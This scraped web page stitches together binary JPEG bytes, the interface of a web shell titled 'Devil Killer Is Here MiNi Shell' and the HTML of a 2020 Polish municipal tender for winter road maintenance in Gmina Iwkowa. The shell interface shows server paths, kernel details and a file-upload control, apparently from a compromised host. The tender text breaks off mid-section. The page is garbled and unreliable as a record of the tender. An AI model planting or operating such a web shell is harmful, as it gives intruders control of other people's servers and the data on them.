JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20201015/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20201015/597850-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 597850-N-2020 z dnia 2020-10-15 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Iwkowa</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h"> Zimowe utrzymanie dróg gminnych na terenie gminy Iwkowa w sezonie zimowym 2020/2021</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Iwkowa</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">85166072000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Iwkowa</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">468</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">32-861</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Iwkowa</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">małopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">14 68-44-010, 68-44-020</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">gmina@iwkowa.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">146 844 060</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.iwkowa.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.iwkowa.pl/przetargi</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.iwkowa.pl/przetargi</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Składanie oferty odbywa się za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r. – Prawo pocztowe (Dz.U z 2020r. poz. 1041 ze zm.), osobiście lub za pośrednictwem posłańców.</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">siedziba Zamawiającego: Urząd Gminy w Iwkowej, 32-861 Iwkowa 468, dziennik podawczy - sala widowiskowa GOK - parter albo sekretariat - II piętro.</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu"> Zimowe utrzymanie dróg gminnych na terenie gminy Iwkowa w sezonie zimowym 2020/2021</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">GKZP.271.12.2020 </span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.	Przedmiotem zamówienia jest zimowe utrzymanie dróg na terenie gminy Iwkowa (w terenie górzystym), sprzętem i materiałem będącym w dyspozycji Wykonawcy. Zimowe utrzymanie dróg dotyczy sezonu zimowego 2020/2021.2.	Przedmiotowe zamówienie zostało podzielone na następujące części:a)	Część 1 - REJON NR I w miejscowościach Iwkowa, Połom Mały:Zakres robót obejmuje: Zimowe utrzymanie dróg w Rejonie nr I poprzez odśnieżanie i likwidację gołoledzi w sposób zapewniający ciągłość przejazdu stosownie do istniejących warunków atmosferycznych, w pierwszej kolejności dróg oznaczonych numerami od 1-10 oraz parkingi oznaczone nr 19. W drugiej kolejności drogi oznaczone numerami od 11-17 oraz parkingi oznaczone nr 20 całodobowe patrolowanie – interwencyjne. Droga oznaczona numerem 18 tylko w sytuacjach interwencji telefonicznej. Lp.	Nazwa drogi1	Iwkowa – Dzięgielowo cała długość wraz z parkingiem k/Orlika2	Iwkowa – Skotnica odcinek pomiędzy drogą powiatową a drogą gminną Dzięgielowo3	Iwkowa – Skirłowo cała długość4	Iwkowa – Bacówka cała długość5	Iwkowa – Piekarnia cała długość wraz z parkingiem k/Kościółka6	Iwkowa – Pańskie od drogi powiatowej do ostatnich zabudowań 7	Iwkowa – Ośrodek Zdr. cała długość8	Iwkowa – k/szkoły cała długość wraz z parkingami9	Iwkowa – Pagórek, Połom Mały cała długość (do willi pod Gruszą)10	Połom Mały – Witowice cała długość (do końca granicy gminy) 11	Iwkowa – Stary Gościniec do ostatnich zabudowań12	Iwkowa – Murkowo od drogi powiatowej do P. Jana Gawełda 13	Iwkowa – Piłkówka od drogi powiatowej do zabudowań zamieszkałych całorocznie (pozostałe interwencyjnie)14	Połom Mały – Wytrzyszczka cała długość (do końca granicy gminy)15	Połom Mały – Porąbka Iwkowska (od początku drogi do końca asfaltu)16	Iwkowa Kąciny – Wytrzyszczka cała długość (do końca granicy gminy)17	Iwkowa – Kozieniec cała długość18	Iwkowa – Góry interwencyjnie od drogi powiatowej do zabudowań19	Parkingi k/Urzędu Gminy, Place w centrum Iwkowej20	Parking k/OSP Iwkowa, Parking k/Ośrodka Odśnieżanie i likwidację gołoledzi należy prowadzić: - na polecenie Wójta Gminy, Zastępcy Wójta lub upoważnionego pracownika (dotyczy odśnieżania i likwidacji gołoledzi). - bez polecenia w/w osób jeżeli luźna warstwa pokrywy śnieżnej na drodze przekracza 10 cm i nadal trwają opady śniegu lub wieje wiatr sprzyjający tworzeniu się zasp (dotyczy odśnieżania),- bez polecenia w/w osób jeżeli występuje zjawisko gołoledzi (dotyczy posypki) w szczególności na wzniesieniach, zakrętach, skrzyżowaniach, zjazdach, podjazdach, miejscach mało widocznych i innych niebezpiecznych dla ruchu odcinkach dróg. - użycie pługa wirnikowego do ośnieżania tylko na bezpośrednie (lub telefoniczne) polecenie Wójta Gminy, Zastępcy Wójta lub upoważnionego pracownika.Sprzęt:Wykonawca winien posiadać co najmniej:- dwa ciągniki: moc min. 50 kM, napęd min. 2 x 4 z pługami zawieszanymi czołowo, przygotowane do odśnieżania w tym jeden przygotowany do posypki,- jeden pług wirnikowy doczepiany lub samobieżny.Dodatkowo można zastosować – w miejscach (odcinkach) gdzie jest to możliwe samochód ciężarowy: moc min. 120 kM z pługiem zawieszanym czołowo przygotowanym do odśnieżania lub samochód ciężarowy: moc min. 120 kM przygotowany do posypki. Opisany sprzęt ma być wyposażony w łańcuchy na koła, linki holownicze, łopaty, odpowiednio oznakowany zgodnie z przepisami ruchu drogowego oraz winien być dostosowany do specyfiki usytuowania oraz szerokości dróg gminnych. Posypka:Posypka dróg materiałem uszorstniającym bez dodatku środków chemicznych, jedynie w szczególnych przypadkach na polecenie Zamawiającego dopuszczalne jest ich stosowanie. Pełne zabezpieczenie odpowiedniej ilości materiału do posypki wystarczającej na cały sezon zimowy jest w gestii Wykonawcy. Sposób potwierdzania wykonanych usług:Zamawiający zastrzega sobie prawo do zamontowania w pojazdach mechanicznych urządzeń monitorujących czas pracy sprzętu, które będą potwierdzać ilość przepracowanych godzin. Podstawą do wypłaty wynagrodzenia będzie zestawienie ilości godzin z urządzenia monitorującego.b)	Część 2 - REJON NR II w miejscowościach: Kąty, Dobrociesz, Drużków Pusty, Porąbka Iwkowska:Zakres robót obejmuje: Zimowe utrzymanie dróg w Rejonie nr II poprzez odśnieżanie i likwidację gołoledzi w sposób zapewniający ciągłość przejazdu stosownie do istniejących warunków atmosferycznych, w pierwszej kolejności dróg oznaczonych numerami od 1-8, w drugiej kolejności drogi oznaczone numerami od 9-18 oraz całodobowe patrolowanie – interwencyjne. Lp.	Nazwa drogi1	Drużków Pusty – Porąbka Iwkowska cała droga 2	Kąty-Góry-Sechna-Dobrociesz cała długość, do granicy gminy, do P. Zelka3	Kąty – Grabie od krzyżówki z drogą gminną do posesji P. Gwiżdżów4	Kąty-Grabie-Michalczowa cała długość5	Kąty – Pasterniki – Dobrociesz od krzyżówki z drogą powiatową do skrzyżowania z drogą powiatową w Dobrocieszu 6	Kąty-Parkingi centrum7	Kąty – Sławikówka cała długość8	Drużków Pusty – Połom Mały - Kąty Zatoki cała długość+boczne9	Dobrociesz – Bieleckówka od krzyżówki z drogą gminną do posesji do P.Krzyżaków10	Dobrociesz – Kmieciówka od drogi powiatowej do linii zabudowań11	Kąty – Pasterniki od drogi powiatowej do posesji P.Midów i do P. Staszak12	Dobrociesz – Padoły do P. Bodek13	Kąty-Góry-Pasterniki do P. Andrzeja Szewczyka 14	Drużków Pusty Kamieniec od drogi powiatowej do P. Zyznawskiego15	Drużków Pusty – Rędziny 200m16	Kąty-Drużkó w Pusty od drogi gminnej na całej długości17	Drużków Pusty – Poczekaj do P. Jarzmika18	Porąbka Iwkowska-Zarzecze cała długośćOdśnieżanie i likwidację gołoledzi należy prowadzić: - na polecenie Wójta Gminy, Zastępcy Wójta lub upoważnionego pracownika (dotyczy odśnieżania i likwidacji gołoledzi). - bez polecenia w/w osób jeżeli luźna warstwa pokrywy śnieżnej na drodze przekracza 10 cm i nadal trwają opady śniegu lub wieje wiatr sprzyjający tworzeniu się zasp (dotyczy odśnieżania),- bez polecenia w/w osób jeżeli występuje zjawisko gołoledzi (dotyczy posypki) w szczególności na wzniesieniach, zakrętach, skrzyżowaniach, zjazdach, podjazdach, miejscach mało widocznych i innych niebezpiecznych dla ruchu odcinkach dróg, - użycie pługa wirnikowego do ośnieżania tylko na bezpośrednie (lub telefoniczne) polecenie Wójta Gminy, Zastępcy Wójta lub upoważnionego pracownika. Sprzęt: Wykonawca winien posiadać co najmniej:-dwa ciągniki: moc min. 80 kM, napęd min. 4 x 4 z pługami zawieszanymi czołowo, przygotowane do odśnieżania w tym jeden przygotowany do posypki,- jeden pług wirnikowy doczepiany lub samobieżnyDodatkowo można zastosować – w miejscach (odcinkach) gdzie jest to możliwe samochód ciężarowy: moc min. 120 kM z pługiem zawieszanym czołowo przygotowanym do odśnieżania lub samochód ciężarowy: moc min. 120 kM przygotowany do posypki. Opisany sprzęt ma być wyposażony w łańcuchy na koła, linki holownicze, łopaty, odpowiednio oznakowany zgodnie z przepisami ruchu drogowego oraz winien być dostosowany do specyfiki usytuowania oraz szerokości dróg gminnych.Posypka:Posypka dróg materiałem uszorstniającym bez dodatku środków chemicznych, jedynie w szczególnych przypadkach na polecenie Zamawiającego dopuszczalne jest ich stosowanie. Pełne zabezpieczenie odpowiedniej ilości materiału do posypki wystarczającej na cały sezon zimowy jest w gestii Wykonawcy. Sposób potwierdzania wykonanych robót Zamawiający zastrzega sobie prawo do zamontowania w pojazdach mechanicznych urządzeń monitorujących czas pracy sprzętu, które będą potwierdzać ilość przepracowanych godzin. Podstawą do wypłaty wynagrodzenia będzie zestawienie ilości godzin z urządzenia monitorującego.4. Zamawiający wymaga (dotyczy każdej części), aby Wykonawca lub Podwykonawca przez cały okres realizacji zamówienia zatrudniał na podstawie umowy o pracę w rozumieniu obowiązujących przepisów ustawy w tym zakresie osób wykonujących następujące czynności w trakcie realizacji zamówienia, tj. osoby kierujące pojazdami.Powyższy warunek zostanie spełniony poprzez zatrudnienie na umowę o pracę nowych pracowników lub wyznaczenie do realizacji zamówienia zatrudnionych już u Wykonawcy pracowników. Sposób dokumentowania zatrudnienia osób i uprawnienia Zamawiającego w zakresie kontroli spełnienia przez Wykonawcę wymagań, o których mowa w art. 29 ust. 3a oraz sankcje z tytułu niespełnienia tych wymagań określa projekt umowy, stanowiący załącznik nr 7 do SIWZ.Powyższy zapis nie dotyczy osób prowadzących samodzielnie działalność jednoosobową, którzy sami będą realizować przedmiot zamówienia. </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">90620000-9</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90630000-2</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Tak</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst">przewiduje udzielenia zamówień zgodnie z art.67 ust. 1 pkt 6 ustawy Pzp polegających na powtórzeniu podobnych usług. Zakres usług podobnych jest tożsamy z zakresem przewidzianym dla zamówienia podstawowego. Zamówienie zostanie udzielone na warunkach określonych w ustawie Prawo zamówień publicznych w trybie zamówienia z wolnej ręki.</span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2021-03-15</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) 